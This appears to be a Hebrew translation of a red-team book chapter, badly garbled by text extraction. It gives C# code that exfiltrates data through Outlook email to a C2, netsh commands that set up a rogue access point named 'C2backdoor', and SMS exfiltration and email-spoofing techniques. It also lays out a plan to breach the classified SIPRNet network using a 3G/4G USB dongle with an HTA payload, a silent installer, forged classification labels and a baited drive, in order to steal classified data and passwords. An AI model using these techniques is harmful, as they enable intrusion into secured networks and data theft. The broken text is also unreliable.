‫‪Body"; c2Mail.Attachments.Add(AssignNoteFilePath,‬‬
‫‪C2"; c2Mail.Body = "C2‬‬
‫;)"‪Microsoft.Office.Interop.Outlook.OlAttachmentType.olByValue, 1, "C2attachment.txt‬‬
‫;)(‪c2Mail.Send‬‬
‫לא ניתן להגדיר מיי ל ממ שתנה באמצעות ‪-Outlook API‬ה) ל לא ק שר ל שפה(‪ ,‬כך שהמיי ל‬
‫יי ש ל ח באמצעות ח ש בון היעד וזה ב סדר‪.‬‬
‫המיי ל לאיי שמר בפרי טים שנ ש ל חו‪ ,‬מ כיוון שזה דור ש קריאת ‪ API‬ספציפית‪ ,‬במ קרה הזה‬
‫‪c2Mail.Save(),‬א ב ל שו ב זה ב סדר גמור מנ קודת המ ב ט ש לנו‪.‬‬
‫שימו ש בת חנת ע בודה למ ח ש ב נייד כנ קודת גי שה א ל חו טית‬

‫בר שתות ש בהן המנה לים מ בינים בא ב ט חת מידע‪ ,‬מדיניות א כיפה לא תאפ שר הן ‪NIC‬‬
‫‪ -Ethernet‬ל והן ‪ -NIC‬להא ל חו טי להיות פעי לים בו‪-‬זמנית‪ ,‬גם אם לא מזוהים נ קודות גי שה‬
‫א ל חו טיות‪ .‬גי שה זו מונעת הת קפות מרו בות ש כ בות מ סוימות‪ ,‬אך סו כן ‪C2‬י כו ל בדרך כ ל ל‬
‫לאפ שר ‪NIC‬א ל חו טי‪ ,‬בתנאי שי ש לו מ ספי ק הר שאות מ קומיות‪ .‬המ טרה כאן היא כפו לה‪:‬‬
‫ח בר את המ ח ש ב הנייד באמצעות א ל חו טי ‪ -AP‬ל שאתה שו ל ט בו‪ .‬זה בעייתי אם היעד ת לוי‬

‫כרגע ‪ -AP‬בא חר לגי שה לר שת‪.‬י ש אפ שרות להת קפה מתוזמנת ש בה ‪-AP‬ה מוע בר לא חד‬
‫ש בו אתה שו ל ט ברגע ש בוי ש סי כוי נמוךיותר שהמ שתמ שי שתמ ש במ ח ש ב הנייד‪ .‬עם זאת‪,‬‬
‫בהת ח ש ב ב כך שמ ח ש ב נייד צפוי להיות מו סר מר שת היעד מ חוץ ל שעות המ שרד פירו שו‬
‫שה ח לון ש לךיהיה ק טן ‪-‬או לי הפ ס קת צהריים‪.‬‬
‫י ש דרך טו בהיותר‪.‬י ש ת כונה נ סתרת ‪ -Windows‬בהמאפ שרת לך לאר ח ‪ AP‬מ ש לך תוך‬

‫כדי חי בור לא חד א חר עם אותו מתאם‪ .‬הפונ קציונ ליות ש ל שיתוף חי בור לאינ טרנ ט‬
‫מאפ שרת לך לנת ב תע בורה מר שת א חת לא חרת ) בין אם זה בין א ל חו טי‪Ethernet, ,‬או‬
‫אפי לו ‪PAN Bluetooth).‬אני לאיודע איזה מדען טי לים במי קרו סופ ט ח ש ב שזהיהיה רעיון‬
‫טו ב‪ ,‬א ב ל אנ חנו מודים ל כם‪ .‬ההגדרה הזו היא טריוויא לית‪ .‬מ שורת הפ קודה‪:‬‬
‫= ‪ "c> netsh wlan set hostednetwork mode ="allow" ssid="C2backdoor" key‬סי סמה"‬
‫כדי להפעי ל ‪ICS:‬‬
‫הת ח ל נ טו ‪SharedAccess‬‬
‫ה קי לומ טראז' ש לך ע שוי לה שתנות בהתאם לגר סת ‪ Windows‬ב שימו ש‪ ,‬אך אם‬
‫ה קי לומ טראז' ש לך ע שוי לה שתנות בהתאם לגר סת ‪ Windows‬שנמצאת ב שימו ש‪,‬‬

‫אך אם אתה נמצא במר ח ק א ל חו טי מה‪ ,PA-‬זהי כו ל להוות פתרון טו ב ל טוו ח קצר‪.‬‬
‫נתונים ניידים‪ /‬ב לו טו ס‬
‫הגנה ע ל אתר )או אזור ק טן באתר( מפני תו קפים המ שתמ שים בנתונים ניידים היא‬
‫) לפ חות בתיאוריה( טריוויא לית‪ .‬ניתן לא ב ט ח חדר עם כ לו ב פאראדיי‪ ,‬מה שמ ב טי ח‬
‫שאותות רדיו לאיו כ לו להי כנ ס או לצאת‪ ,‬א ב ל הצד הת חתון ש לו הוא שאותות רדיו לא‬
‫י כו לים להי כנ ס או לצאת‪ ,‬כו ל ל ט טרה או ת ק שורת א חרת ב כ ל האתר‪ ,‬האו סרת בנו סף‬
‫ע ל ה שימו ש בנייד ט לפונים באופן כ ל לי‪.‬‬
‫במדינות מ סוימות‪ ,‬זה חו קי לה שתמ ש ב חו סמי ס לו לר כדי ל ש ב ש את הת ק שורת‬
‫ה ס לו לרית ב ש ט ח האתר‪ ,‬א ב ל שו ב ח סימת ה ספ קים מהע ברת נתונים תגרום לרו ב‬
‫הע ס קים אי נו חות חמורה‪ .‬כמה אתרי א ב ט חה ג בוהים פ שו טימנעו ט לפונים ס לו לריים‬
‫לפי מדיניות וי שאירו את זה כך‪ ,‬מה שעו בד טו ב כמו שאפ שר לצפות‪ .‬לפני כמה שנים‬
‫נתתי הרצאה ‪ -GCHQ‬ב ו לא חד העו בדים היה מ כ שיר ק טן שיד ל ק אםיזהה אות ס לו לרי‪.‬‬
‫כ שזה קרה‪ ,‬הוא קם וגער ב לעג ב חדר והז כיר למ שתתפים שהם אמורים לה שאיר ניידים‬
‫ב ק ב לה‪.‬‬
‫לפני שמפנ קים את כו לנו ב קריצה ענ קית‪.‬‬

‫כו לם צ ח קו חוץ מה" קוזינ ס" )המונ ח ה ב לתי ר שמי במודיעין ה ברי טי ע בור עמיתיהם‬
‫בארה" ב(‪ ,‬א ב ל הם נו טים ל ק חת את א ב ט חת המידע קצתיותר ברצינות‪.‬‬
‫ב כ ל מ קרה‪ ,‬מדיניות כזו לא תמנע את ה שימו ש ב‪ 4G /G3-‬כאמצעי ל חי לוץ נתונים‪ ,‬ו ל כן‬
‫אדון בה בהר ח בה ב סעיף ה בא‪.‬‬
‫סמ ס‬
‫אם הצ ל חת לפרו ס מ טען שה שיג אות ס לו לרי נייד‪,‬י ש לך אמצעי נו סף ל ש לי חת נתונים‪.‬‬

‫היתרונות ש ל ‪ SMS‬ק טנים אך ראויים להז כיר ‪- C2‬הגוןידרו ש אות ‪ 3G/4G‬וזה לא‬
‫תמיד זמין בצורה מהימנה‪ .‬עם זאת‪SMS ,‬יע בוד מצוין אםי ש לך ר ק ‪GPRS.‬‬
‫אורך ההודעה המ ק סימ לי להודעת ‪SMS‬הוא ‪918‬תווים ) כ ל הודעה שהיא מע ל ‪160‬‬

‫תווים תפור ק לנת חים ק טניםיותר ות ש ל ח לנמען בנפרד(‪ ,‬כך שזה לאיהיה שימו שי‬
‫במיו חד ע בור כמויות גדו לות ש ל נתונים‪ ,‬א לא אם כן‪ .‬מו כנים ל כתו ב קצת קוד כדי לפר ק‬
‫מ סמ כים לגו שים ק טנים ואז להר כי ב אותם מ חד ש‪ .‬עם זאת‪ ,‬מציאותית‪ ,‬זה שימו שייותר‬
‫ע בור הפרי טים ה ק טניםיותר שתרצה ל ח טוף‪ ,‬כגון קו בצי סי סמאות‪ .‬די ברתי קודם ע ל‬
‫דוא" ל ע ס קה ו כיצד זהי כו ל להיות שימו שי מתי‬
‫ק בצים‪ .‬די ברתי קודם ע ל דוא" ל ע ס קה ו כיצד זהי כו ל להיות שימו שי בעת פרי סת מ ספר‬
‫ר ב ש ל מ טענים באמצעות דואר א ל ק טרוני‪ .‬בפר ק ה בא‪ ,‬נ ב חן את ה‪ SMS-‬הע ס קאות‬
‫ואת היתרונות ש לו במוד לים ש ל ‪APT.‬נ ב חן גם פונ קציונ ליות לא מתועדת בפרו טו קו ל‬
‫‪ SMS‬ו כיצד זהי כו ל להיות שימו שי בפי קוד ו ב קרה‪.‬‬
‫סרג ל צד ש ל זיוף דואר‬
‫פעם מאו שרת‪ ,‬פרו טו קו לי הדואר הי חידים שהיו ב שימו ש היו ‪-SMTP.‬ו ‪POP3‬אף‬
‫א חת מהן לא סיפ קה שום הצפנה ודואר זיוף היה פ שו ט כמו להת ח בר ל שרת‬
‫‪-SMTP‬ההנ כנ ס ש ל היעד דרך ‪telnet‬או ‪ netcat‬ו לומר את הד בר שאתה כ ל מי‬
‫שאתה רוצה להיות‪ .‬במ קרים ר בים‪ ,‬אתה עדייןי כו ל לע שות זאת‪ ,‬אךי שנן ט כנו לוגיות‬
‫זמינות למנוע זאת‪ .‬הנפוץ ביותר נ קרא ‪Sender Policy Framework (SPF). SPF‬‬
‫היא מער כת אימות דואר פ שו טה שי כו לה לזהות אימיי לים מזויפים ע לידי בדי קה‬
‫שדואר נ כנ ס מ כ ל ת חום נתון נ ש ל ח ע לידי מאר ח מור שה ע לידי אותו ת חום‬
‫) בהנ חה שמאר ח מ ק ב ל תומך כמו בן ב חיפו שי ‪SPF).‬‬
‫זה מיו שם בצורה ש ל ר שומת ‪)DNS TXT‬א שר‪ ,‬כפי שראינו קודם‪,‬י כו לה לא ח סן כ ל‬
‫ערך שרירותי שמנה ל הדומיין רוצה(‪ .‬ר שומת ‪TXT‬זו מא ח סנת את שמות המאר חים‬
‫המור שים ע בור אותו ת חום‪ .‬לדוגמה‪ ,‬אם אנו מ סת כ לים ע ל ר שומות ‪-TXT‬ה ש ל‬
‫‪paypal.com,‬אנו רואים את הד ברים ה באים‪:‬‬
‫"‪$ dig +short paypal.com TXT "yandex-verification: 73acb90f6a9abd76‬‬
‫‪~all" "google-site verification=cWgMibJls3loUnoXRY4FHkeO3xGvDA4i8wnrQnolBxs‬‬

‫‪include:3ph3._spf.paypal.com include:3ph4._spf .paypal.com include:c._spf.ebay.com‬‬
‫‪include:pp._spf.paypal.com include:3ph1._spf.paypal.com include:3ph2._spf.paypal.com‬‬
‫‪"MS=ms95960309" "v=spf1‬‬
‫כ ל מיי לים המתיימרים להיות ‪-PayPal‬מ)ו כו לנו ראינו אותם( שאינם מ קורם‬
‫במאר חים הר שומים כאןיי כ ש לו במ ב חן ‪ SPF‬ו ס ביר להני ח שיזר קוי שירות לתי קיית‬
‫ה ספאם אם לא ר קיימ ח קו‪ .‬זה לא מ שנה כמה העי לה מ ש כנעת‪ ,‬זה לאיע בוד‪.‬‬
‫ההנ חה כאן היא שאתה תמיד צריך ל בדו ק אם לדומייןי ש הגנת ‪ SPF‬לפני שתנ סה‬
‫לזייף אותו‪.‬‬
‫הגנה לפני ני סיון לזייף אותו‪.‬‬
‫ההת קפה‬
‫בפר ק ש ל ‪ The West Wing,‬מז כירת העיתונות ‪ )CJ Cregg‬בגי לומה ש ל א לי סון ג'אני ה ב לתי ניתנת‬
‫ל חי קוי( נפרצה לת חנת הע בודה ש לה ע לידי ס טו קר ואומרת לעמית‪" ,‬האםידעת שר שת ה בית ה ל בן‬
‫אפי לו לא מאו ב ט חת?"‬
‫זה היה מדוי ק? בערך‪.‬‬
‫כא שר אנו מד ברים ע ל "מא ב ט ח" בה ק שר ש ל ר שתות ממ ש לתיות או צ באיות‪ ,‬למי להי ש מ שמעות מאוד‬
‫ספציפית‪ .‬זה לא אומר שאמצעים קיצוניים לא נ כנ סו לא ב ט חתו‪ ,‬א לא פ שו ט שאם ר שת מ חו ברת לאינ טרנ ט‪,‬‬
‫היא מ ט בעה " לא מאו ב ט חת"‪ .‬אמורה להיות לך ציפייה מוג ב לת לא ב ט חה והת שתית אינה מדורגת ע בור‬
‫נתונים מ סווגים או מ סומנים באופן מגן‪.‬‬
‫אני לא מז כיר שום שמות‪ ,‬א ב ל אם הייתי מז כיר המדינה הייתי רוצה גם שרת אימיי ל מ ש לי‪.‬‬
‫אם ת שתית צרי כה ל טפ ל בנתונים מ סווגים‪ ,‬היא צרי כה להתאים ל ס טנדר טים מ סוימים‪ .‬ר שתות א לו‬
‫מופרדות מ כ ל מה שהצוות ש לך מ שתמ ש בו כדי לג לו ש באינ טרנ ט‪ ,‬ל ש ח ק סו לי טר ו בדרך כ ל ל ל בז בז‬
‫את כ ספי מ ש לם המ סים‪ .‬די ברתי ב קצרה ע ל ‪ SIPRNet‬ו לזה אני הו לך ל חזור ע כ שיו‪.‬‬
‫ה ט ק ס ט ה בא מצו ט ט מאתר מ שא בי האנו ש ש ל ארה" ב‪:‬‬
‫ר שת נת ב פרו טו קו ל האינ טרנ ט ה סודית )‪(SIPRNet‬היא ר שת מ שרד ההגנה ל חי לופי מידע מ סווג‬
‫והודעות ברמת ‪SECRET.‬הוא תומך במער כת הפי קוד וה ב קרה העו למית‪ ,‬מער כת ההודעות ההגנה‪,‬‬
‫ויי שומי ל חימה ות כנון מ סווגים ר בים א חרים‪ .‬למרות שה‪ teNRPIS-‬מ שתמ ש באותם נה לי ת ק שורת‬
‫כמו האינ טרנ ט‪,‬י ש לו קוויםייעודיים ומוצפנים הנפרדים מ כ ל שאר מער כות הת ק שורת‪ .‬זהו המ ק בי ל‬
‫המ סווג ש ל ר שת נת ב פרו טו קו ל האינ טרנ ט ה ב לתי מ סווגת אך הרגי שה ‪(NIPRNet),‬המ ספ קת‬
‫י כו לת פעו לה הדדית ח ל קה ליי שומי תמי כה ב ל חימה לא מ סווגים וגי שה מ בו קרת לאינ טרנ ט‪.‬‬
‫גי שה ‪ -SIPRNet‬לדור שת אי שור ברמת ‪ SECRET‬ומע לה וצורך במידע שזמין ר ק ‪ -SIPRNet.‬ב מ כיוון‬
‫שה‪ teNRPIS-‬הואיעד ברור ל חדירה עוינת‪ ,‬מ ספר קפדניים‬
‫‪SIPRNet‬הואיעד ברור ל חדירה עוינת‪ ,‬מיו שמים מ ספר נה לי א ב ט חה קפדניים‪.‬‬

‫נדר שים אי שורים מתאימים ואימות דו‪ -‬ש ל בי‪ .‬בעת שימו ש ‪ -SIPRNet,‬בא סור‬
‫לה שאיר את ת חנת הע בודה ל לא ה שג חה‪...‬‬
‫‪ ...‬קי שור מ ח ש ב עם גי שה ‪ -SIPRNet‬ל לאינ טרנ ט או ל כ ל מ ח ש ב א חר או הת קן‬

‫א ח סון מדיה ש לא או שר ל שימו ש עם מידע סודי הוא הפרת א ב ט חה חמורה‪ .‬ברגע‬
‫ש כ ל הת קן א ח סון מדיה כגון ת ק לי טורים או כונן אצ בע חו בר למ ח ש ב עם גי שה‬
‫‪ -SIPRNet,‬להואי סווג ברמת ‪SECRET.‬זה חיי ב להיות מוגן בהתאם ואין לה שתמ ש‬
‫בו ב כ ל מ ח ש ב לא מ סווג‪.‬‬
‫הדג שים הם ש לי‪ .‬דף האינ טרנ ט הנגי ש לצי בור הזה אמר לי את כ ל מה שאני צריך כדי‬
‫לפרוץ לר שת הזו‪ .‬עוד צי טו ט א חד מאותו דף אינ טרנ ט )הפעם ר ק ב ש בי ל ה כיף(‪ :‬ע בור‬
‫מ ח ש בים המ שמ שים לעי בוד מידע מ סווג‪ ,‬מומ לץ לה ש בית אתי כו לת ה קרנתיציאת‬
‫אינפרא אדום ‪(IR).‬אם לא ניתן ל ב ט ל אתיציאת ‪-IR,‬ה כ סה אתיציאת ‪-IR‬ה ב סר ט‬
‫מת כתי‪.‬‬
‫י ש סצנה ב סר ט שנ קראת "אמנות המ ל חמה" )אני לא מ ב קר סר טים א ב ל הייתי מ חמיצה‬

‫אותה(‪ ,‬ש בה ו ס לי סנייפ ס גונ ב נתונים ממ ח ש ב באמצעותיציאת ‪ IR‬כ שהוא ת לוי הפוך‬
‫מ חוץ ל ח לון המ שרד ש ל המ טרה‪ . .‬אני מ בין שזה ר ק סר ט‪ ,‬אז כ ל הצגה ש ל א ב ט חת‬
‫מ ח ש בים תהיה רמזית‪ ,‬א ב ל בעיני זה צעד ר חו ק מדי‪ .‬כ ל מי שאי פעם ני סה לה שתמ ש‬
‫ביציאת ‪-IR‬ה כדי לע שות מ שהו ב כ ל ליודע שזה אופ טימי במ קרה ה טו ב‪ .‬בדרך כ ל ליהיו‬
‫ל כם שני מ ח ש בים עםיציאות ‪-IR‬ה ש להם במר ח ק סנ טימ טרים א חד מה שני שצוע קים‪,‬‬
‫" למה לא תע בדו?!" עם זאת‪ ,‬לפ חות זה מראה שהם חו ש בים )אם כי ב כיוון ה שגוי‬
‫ל ח לו טין(‪.‬‬
‫הערה מהירה בר שת‬

‫פר ָדה‬
‫הַ ָ‬
‫בעוד שר שתות כמו ‪ NIPRNet‬ו‪SIPRNet -‬הןי שויות מרוו חות אוויר‪ ,‬מ ל בד הן והן‬
‫מהאינ טרנ ט הצי בורי הר ח ביותר‪ ,‬זה קורה ר ק ב כ ל מת קן נתון‪ .‬ז כרו ש לר שתות‬
‫א לוי ש מ שתמ שים ב כ ל העו לם ו ל כן לאיהיו להם כ ב ליםייעודיים‪ ,‬כך ש בין האתרים‬
‫ה חי בורים ע שויים לה שתמ ש בת שתית צי בורית‪ ,‬אם כי מוצפנת ברמה שתואמת‬
‫את מדיניות ה טיפו ל בנתונים המ סומנים ‪ -SECRET‬באו ‪ NATO‬ס וֹד‪ .‬ט כנו לוגיות‬
‫כא לה אינןי שירות‬
‫מ סומן ‪ -SECRET‬באו ‪ -NATO SECRET.‬ב ט כנו לוגיות כא לה אינן ר לוונ טיות כאן‬
‫י שירות‪ ,‬אך הן מהוות מ ח קר מעניין‪ .‬נ קודה נו ספת ש כדאי לציין היא ש ק ב לת מידע‬
‫ע ל המ בנה ה כ ל לי ש ל ר שתות מ סווגות אינה ק שה כפי שהיא ע שויה להיראות‪.‬י ש‬
‫לה כ שיר את המ שתמ שים בהפע לתם וי ש ל כתו ב ו לע קו ב א חר קודי ה חי בור‪ .‬התיעוד‬
‫הזה לאיהיה סודי ר ק בג ל ל ש כ כ ל שמ שהו מ סווגיותר‪ ,‬כך ק שהיותר לת ק שר‪ .‬זו‬
‫) במ סגרת הנ חיות מ סוימות( בא חריותם ש ל המ ח ברים להגדיר את ה סימון כפי שהם‬
‫מוצאים לנ כון‪ ,‬והד חף הוא לעתים קרו בות ל שמור ע ל ד ברים נמו כים כ כ ל האפ שר‬
‫כדי למנוע כא בי רא ש והוצאות‪ .‬מ ל בד מדיניות‪ ,‬זה גם הר בהיותרי קר לנ קות אדם‬
‫‪ -SECRET‬ל מא שר ‪ -RESTRICTED.‬לי ש תיעוד ר ב ‪ -SIPRNet‬ב באינ טרנ ט הצי בורי‪.‬‬
‫אמרתי הצהרה נועזת לפני כמה פ ס קאות שע כ שיו אני הו לך לג בות‪ .‬מה אמר לנו‬
‫ה ט ק ס ט המצו ט ט הזה ש כ ל כך קרי טי למ שימה הזו?‬
‫אין מדיניות א ב ט חה במ קום כדי למנוע חי בור כונני ‪ USB‬למ ח ש בי ‪SIPRNet.‬זה‬
‫כנראה קורה כ ל הזמן‪.‬‬
‫לא חר שימו ש בהת קן ‪ USB‬במ ח ש ב המ חו בר ‪ -SIPRNet,‬להואיור ש או טומ טית‬
‫את מדיניות ה טיפו ל ברמת ‪ SECRET‬ו"י ש להגן ע ליו בהתאם ואין לה שתמ ש בו‬
‫ב כ ל מ ח ש ב לא מ סווג"‪.‬‬
‫עדיין מעורפ ל מדי? כדי ל בדו ק את דרי שות המ שימה‪ ,‬אני צריך‪:‬‬
‫בניית מ טען מתאים‪.‬‬
‫שים את המ טען הזה במ קום‪.‬‬
‫ה סר את נתוני היעד‪.‬‬
‫זה סדר טו ב כמו כ ל סדר לג שת ל בעיה‪.‬‬
‫בניית מ טען לת קוף ר שת מ סווגת‬

‫כדי ל בנות מ טען‪ ,‬ת חי לה ע ליך לר כו ש דונג ל ‪USB‬נייד ‪3G/4G‬התומך בא ח סון או‬
‫מאפ שר א ח סון באמצעות כר טי ס ‪MicroSD.‬אתה צריך לפת ח מת קפת תו כנה שתהיה‬
‫מ סוג לת להי שאר ב ב ט חה מת חת לרדאר ‪ AV -‬במ קרה זה‪ ,‬מת קפת ה‪ ATH-‬מהפר ק‬
‫ה קודם כדי להניע ‪ VB/PowerShell‬בעת הפע לה‪ .‬ציר הזמן ש ל המת קפה הוא כד ל קמן‪:‬‬
‫המ שתמ ש מ ח בר את כונן ‪-USB‬ה למ ח ש ב היעד כדי ל ק בוע תו כן ומ בצע את מ טען‬

‫ה‪) ATH-‬או הת קפה א חרת בהתאם למה שמתאים(‪.‬‬
‫התגנ בות מ טען ‪ HTA‬מת קין את מנה לי ההת קן ש ל ‪ 3G/4G‬ע בור הדונג ל ו‬
‫מ קים את ‪C2.‬‬
‫לא חר שזיהיתי שהו שגה גי שה לאינ טרנ ט‪ ,‬ה שתמ ש ב כ ל ה ס קריפ טים המתאימים כדי ל בצע את‬
‫המ טרות המפור טות בהמ שך‪.‬‬
‫ז כור ש‪2C-‬יופ ס ק ברגע שהמ שתמ שי סיר את הדונג ל מהמ ח ש ב‪ ,‬ו ל כן ה חו כמה היא לוודא שת כו לת ה כונן‬
‫מ ספי ק מעניינת כדי שיהיה מ ספי ק זמן להפע לת ה ס קריפ טים ש לך‪.‬‬
‫ה סוגיה הי חידה בנ קודות ה ל לו ש לא נידונה כ בר במ קומות א חרים ב ספר זה היא פרי סת הדריי ברים‬
‫ה חמ קנית‪ .‬א חרי ה כ ל‪ ,‬זה די לא ריא לי לצפות שהיעדי ש לים ע בורך הת קנה אינ טרא ק טי בית‪ .‬למר בה המז ל‪,‬‬
‫זה די טריוויא לי‪.‬‬
‫הת קנת תו כנה ‪ 3G/4G‬חמ קנית בתר חי ש רגי ל ו לגי טימי כא שר מ שתמ ש רוצה להת קין דונג ל נייד‪ ,‬הוא‬
‫ית קין את התו כנה באופןידני‪ ,‬בדרך כ ל ל כ שהוא מתמודד עם מ סך ההת קנה המוצג באיור ‪7.2 .‬‬
‫איור ‪7.2:‬אפי לו רא ש הצנצנת הירו ק ביותר לא הו לך ליפו ל ע ל זה‪.‬‬
‫י שנן שתי גי שות‪ .‬אנ חנוי כו לים לפר ק את המת קין ו ליצור מ ש לנו‬
‫י שנן שתי גי שות‪ .‬אנ חנוי כו לים לפר ק את המת קין ו ליצור מת קין ש ק ט מ ש לנו‪ ,‬וזה ר ק‬
‫עניין ש ל ל שים ל ב אי לו ק בצים מות קנים ואיזו רי שום ‪Registry‬נע שה בהת קנה נ קייה‬
‫ואז ל ח קות את זה‪ .‬או‪ ,‬במ קרה ש ל התו כנה שצוינה )והר בה ספ קים א חרים‪ ,‬אני לא‬
‫מצ ביע כאן(‪,‬י ש אפ שרות להת קנה " ש ק טה"‪ .‬זה כ לו ל כדי להפוך את ד חיפת הת קנות‬
‫המוניות למ ח ש בים ניידים ארגוניים פ חות זמן ר ב‪ ,‬אך גם מ שרת את המ טרות ש לנו‬
‫הי ט ב‪ .‬הפ קודה ה באה תת קין ות ח בר את הדונג ל הנייד באופן או טומ טי‪ ,‬ב ש ק ט ו ל לא‬
‫רי שום‪.‬‬
‫"‪setup_vmb.exe s L2057 v"OPCO_PROP=23415 qn norestart‬‬
‫האפ שרות הי חידה שתצ טרך ל שנות היא מ ספר ‪ OPCO_PROP ,‬שהוא המזהה ש ל‬
‫ה ספ ק ה ס לו לרי‪ .‬א להי שתנו לפי מי קום אך ניתן למצוא אותם ב ק לות באינ טרנ ט‪ ,‬מ כיוון‬
‫שהם עניין ש ל תיעוד צי בורי‪.‬‬
‫ת קיפת המ טרה ופרי סה ש ל המ טען‬

‫אם אתה תוהה מה ע לו ל לגרום למי שהו ל ק חת כונן ‪ USB‬מ כ ל מ קום שהוא ה שיג אותו‬
‫ו ל ח בר אותו למ ח ש ב מאו ב ט ח ומ סווג‪ ,‬אתה שוא ל את ה שא לות הנ כונות‪ .‬קודם כ ל‪ ,‬ז כור‬
‫מה נדון קודם ל כן‪ :‬אם כונן ‪ USB‬מ חו בר לר שת מ סווגת אז מאותו רגעי ש להתיי ח ס‬
‫א ליו באותה רמה ש ל מדיניות הגנה כמו הר שת עצמה‪.‬‬
‫למר בה האירוניה‪ ,‬זה נותן לנו את עצמנו‪ .‬במ קרה זה‪ ,‬זיהוי כונן ‪-USB‬ה עם ה סימונים‬
‫הנ כונים כדי לרמוז שמ קורו ‪ -SIPRNet‬בהוא המ חזה‪ .‬ניתן לה שיג זאת ע לידי הד ב קת‬
‫התוויות ה באות ל כ ל צד ש ל המ כ שיר‪.‬‬
‫‪ SIPDIS‬פירו שו שזה מיועד להפצה ש ל ‪-NOFORN‬ו ‪ SIPRNet‬פירו שו ל לא אזר חים‬
‫זרים )ראה איור ‪7.3).‬‬
‫איור ‪7.3:‬זהיוצר את העי לה‪.‬‬

‫ה ח ל ק ה ק שה ביותר ב כ ל התר חי ש הזה הוא לה כני ס את הדי ס ק למצ ב ש בו הוא נמצא‬
‫)מ כיוון שהוא הו שמ ט‪ ,‬הונ ח או טופ לה(‪ .‬אז זהיוע בר ב שר שרת מ שמורת עד שיגיע‬
‫לצוות גרין רום‪ ,‬שירצה לדעת מה היה במ כ שיר הזה‪ .‬א לא אם כןי ש תרגי ל זיהוי פ לי לי‬
‫מתואם וצוות ק שור במת קן המות קף ) שדור ש כ ל מיני ניירת לא נעימה ש ל הצ בעת‬
‫אצ בעות ו כןי כו לת ח קירה מיו חדת(‪ ,‬הדרך ה ק לה ביותר לה שיג זאת‬
‫כמו גםי כו לת ח קירה מיו חדת(‪ ,‬הדרך ה ק לה ביותר לה שיג זאת היא ל ח בר אותו לת חנת‬
‫ע בודה ש ל ‪ SIPRNet.‬למר בה האירוניה‪ ,‬זו הדרך ה ק לה ביותר לא ל ש בור את מדיניות‬
‫הא ב ט חה‪ .‬הת קפה זוי כו לה להיותיעי לה בצורה הר סנית ב כ ל ס בי בה מאו ב ט חת‪.‬‬
‫ה חו כמה היא לה כני ס את המ כ שיר לר שות המ טרה מ ב לי לעורר ח שד‪ ,‬א ב ל אין שם שום‬
‫ד בר חד ש‪ .‬רו ב ההת קפות מה סוג הזה מ ש כנעותיותר אם אתהי כו ל לגרום למי שהו א חר‬
‫לע שות אותן ע בורך‪ .‬כי סינו את הפרי סה הפיזית ש ל ח בי לות מ טרה במ קומות א חרים‪ ,‬א ב ל‬
‫רעיון א חד הוא שנערי צ בא נו טים ל שתותי חד באותם מ קומות‪.‬י ש הזדמנות מו ש למת לא חד‬
‫מהם " למצוא" מ שהו שהםיני חו שא חד מעמיתיהםירד‪ ,‬במיו חד א חרי כמה בירות‪.‬‬
‫חי לוץ נתוניםיעי ל ב קצ ב התפרצות‬
‫זה לא ריא לי ל ח שו ב שמת קפה כזו ) לפ חות כ ש לעצמה( תיצור כ ל פתרון ‪ C2‬ל טוו ח ארוך‪.‬‬
‫א חרי ה כ ל‪ ,‬המת קפה תימ שך ר ק כ ל עוד ה חומרה מ חו ברת למ ח ש ב ‪ SIPRNet.‬ל כן‪,‬‬
‫המ טרות ש ל הת קפה מ סוג זה צרי כות להיות מוגדרות מרא ש וצרי כות להיות מאוד ספציפיות‪.‬‬
‫מ טרות נפוצות כו ל לות‪:‬‬

‫גני בת נתונים מ סווגים‪ .‬ב ק ש מהמ טען ל חפ ש את המער כת המ קומית ו שיתופי ק בצים‬
‫ע בור סוגי ק בצים מ סוימים‪ .‬מ סמ כי מ שרד שמתאימים ל קרי טריונים נתונים הם בדרך‬
‫כ ל ל הת ח לה טו בה‪.‬‬
‫ר כ שו הר שאות מוג ברות )אם עדיין לא זמינות( וזרו ק את ה סי סמאות המ קומיות‪ .‬לא‬
‫ס ביר להני ח שהםיהיו שימו שיים במיו חד בהת ח ש ב ב ס בי בה כמו גם ב שימו ש באימות‬
‫דו‪-‬גורמי‪ ,‬א ב ל תמיד כיף ל ק ב ל אותם‪ .‬אתה אף פעם לאיודע מתי הם ע שויים להיות‬
‫שימו שיים‪ ,‬במיו חד ח ש בונות ניהו ל מ קומיים‪.‬‬
‫מ טמונים‪ ,‬קו בצי ‪ Cookie‬ו סי סמאות מ קומיים‪ C2 .‬לאיהיה פעי ל מ ספי ק זמן כדי ש כ ל‬
‫סוג ש ל פעי לות רי שום מפת ח תהיה שווה לע סו ק בה‪.‬‬
‫נתוני ‪ LDAP.‬ברגע שאתה נמצא בתוך ר שת מ סווגת‪ ,‬ה ט כנו לוגיות שתת ק ל בהן מע ט‬
‫שונות מרו ב הר שתות הארגוניות‪ .‬הצ בא הוא כמו כ ל ארגון גדו ל א חר ‪ -‬ביורו קר טיה‬
‫מ למע לה למ טה שמו ב לת ע לידי ג ברים מ בוגרים שאינםיודעים הר בה ע ל ט כנו לוגיה‪.‬‬
‫הצ בא מ שתמ ש ‪-WSUS‬ו ‪ -SharePoint, Exchange‬ב כמו כו לם‪ .‬אנויודעים מאדוארד‬
‫סנודן עד כמה הרא שון פופו לרי‪ .‬א להיוצרים מ טרותיפות‪.‬‬
‫מנ קודת מ ב ט גרידא ש ל בדי קת חדירה‪ ,‬אתה צריך ל ש לם סוג כ ל שהו‬

‫ש ל מ ס שפתיים כדי למ קד מדיניות א ב ט חה כא שר אתה פוגע בר שתות מ סווגות‪ .‬ל ק חת נתונים המ סומנים‬
‫ב סוד מע ל ערוץ ‪ C2‬ש לך אינו רעיון טו ב א לא אם כן הוא ות שתית ‪ C2‬ש לך מאו שרים ל טיפו ל בנתונים‬
‫כא לה ו בואו נהיה כנים‪ ,‬הם לאיהיו‪ .‬מה ב חינה הזו‪ ,‬צי לום מ סך כדי להו כי ח שהיית שם היא דרך ב טו חה‬
‫יותר ל ל כת‪.‬‬
‫סי כום‬
‫מ טרת פר ק זה הייתה ל למד אותך ש לו שה ד ברים‪:‬‬
‫ניתן ל חדור אפי לו לר שתות המאו ב ט חות ביותר‪.‬‬
‫ניתן ל סנן נתונים אפי לו מהר שתות המאו ב ט חות ביותר‪.‬‬
‫ניתן להפנות מדיניות א ב ט חה נגד ארגון עם נה לי טיפו ל קפדניים בנתונים‪.‬‬
‫הדוגמאות שניתנו או לי נראות מומצאות א ב ל הן לא‪ .‬כ ל מה שנדר ש כדי שתו קףיז כה ב כני סה ל ס בי בות‬
‫המאו ב ט חות ביותר הוא ש לאדם א חד תהיה הפ ס קה א חת ב שיפו ט פעם א חת‪ .‬אני ממ שיך לה סיע את הנ קודה‬
